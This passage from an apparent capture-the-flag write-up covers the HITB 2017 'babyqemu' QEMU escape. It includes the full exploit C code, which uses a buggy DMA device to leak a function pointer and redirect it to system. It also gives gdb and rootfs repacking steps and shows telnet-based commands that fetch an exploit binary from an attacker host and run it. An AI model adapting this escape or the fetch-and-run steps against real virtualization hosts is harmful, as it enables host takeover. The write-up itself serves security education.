    sleep(1);
}

void dma_write_qword(uint64_t offset, uint64_t val)
{
    dma_write(offset, (char *)&val, 8);
}

void dma_enc_read(uint64_t offset, uint64_t cnt)
{
    // set the index into dma_buf
    set_src(DMA_BASE + offset);
    // set the physical address the data will be written to
    set_dst(tmpbuf_phys_addr);
    // set the size to read
    set_cnt(cnt);
    // trigger hitb_dma_timer
    start_dma_timer(1|2|4);
    // wait for the timer callback to run
    sleep(1);
}

int main(int argc, char const *argv[])
{
    getMMIOBase();
    printf("mmio_base Resource0Base: %p\n", mmio_base);
    tmpbuf = malloc(0x1000);
    tmpbuf_phys_addr = gva_to_gpa(tmpbuf);
    printf("gva_to_gpa tmpbuf_phys_addr %p\n", (void*)tmpbuf_phys_addr);

    // just test
    // dma_write(0, "giantbranch", 11);
    // dma_read(0, 11);
    // printf("tmpbuf: %s\n", tmpbuf);

    // leak the enc function pointer to tmpbuf_phys_addr, then read it back through tmpbuf
    dma_read(4096, 8);
    uint64_t hitb_enc_addr = *((uint64_t*)tmpbuf);
    uint64_t binary_base_addr = hitb_enc_addr - 0x283DD0;
    uint64_t system_addr = binary_base_addr + 0x1FDB18;
    printf("hitb_enc_addr: 0x%lx\n", hitb_enc_addr);
    printf("binary_base_addr: 0x%lx\n", binary_base_addr);
    printf("system_addr: 0x%lx\n", system_addr);

    // overwrite the enc function pointer with the address of system
    dma_write_qword(4096, system_addr);

    // write the command we want to execute into dma_buf (staged through tmpbuf)
    // char* command = "gnome-calculator";
    // char* command = "pwd";
    char* command = "cat flag";
    dma_write(0x200, command, strlen(command));

    // trigger the enc call inside hitb_dma_timer, which now goes to system
    // the 666 below sets cnt; any value works, it has no effect here
    dma_enc_read(0x200, 666);
    return 0;
}
Debugging: since the binary has symbols, we can simply set breakpoints on the functions. Because they are hit several times during boot on my machine, I put a bunch of c (continue) commands in the script.
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ cat start.txt
run -initrd ./rootfs.cpio -kernel ./vmlinuz-4.8.0-52-generic -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null -m 64M --nographic -L ./dependency/usr/local/share/qemu -L pc-bios -device hitb,id=vda
b hitb_dma_timer
b hitb_mmio_write
c
c
c
c
c
c
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ sudo gdb -q ./qemu-system-x86_64
pwndbg: loaded 176 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./qemu-system-x86_64...done.
gdb-peda$ source start.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff0c35700 (LWP 28226)]
[New Thread 0x7ffff0434700 (LWP 28229)]
[New Thread 0x7fffed3ff700 (LWP 28231)]
Since neither ssh nor scp works here and there is no network either, the only option is to unpack the filesystem, drop the exploit into root's home directory, and repack it.
Unpack with cpio -idmv < rootfs.cpio; put rootfs.cpio into a freshly created directory before extracting. Sometimes rootfs.cpio is additionally gzip-compressed, in which case run gunzip ./rootfs.cpio.gz first and then the command above.
After that, whenever the exploit changes, just run the following script:
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ cat ./cpexptorootfs.sh
gcc -o exp -static exp.c
cp ./exp ./rootfs/root
cd ./rootfs && find . | cpio -o --format=newc > ../rootfs.cpio
Of course, in an actual competition the network would be reachable. The guest here is a minimal embedded-style system without nc, but it does have busybox, and busybox's telnet is enough to download the exploit, for example like this (with something such as nc listening on the attacker's side and serving the base64-encoded binary):
# telnet XXX.XXX.XXX.XXX 6666 > pwn.b64
# base64 -d pwn.b64 > pwn
# chmod +x pwn
# ./pwn
Main reference:
https://kitctf.de/writeups/hitb2017/babyqemu
Other references:
https://github.com/coreos/qemu/blob/ed988a3274c8e08ce220419cb48ef81a16754ea4/include/qemu/timer.h#L414
https://github.com/qemu/qemu
https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L96
https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L666
https://zh.wikipedia.org/wiki/%E7%9B%B4%E6%8E%A5%E8%A8%98%E6%86%B6%E9%AB%94%E5%AD%98%E5%8F%96
https://www.giantbranch.cn/2019/07/17/VM%20escape%20%E4%B9%8B%20QEMU%20Case%20Study/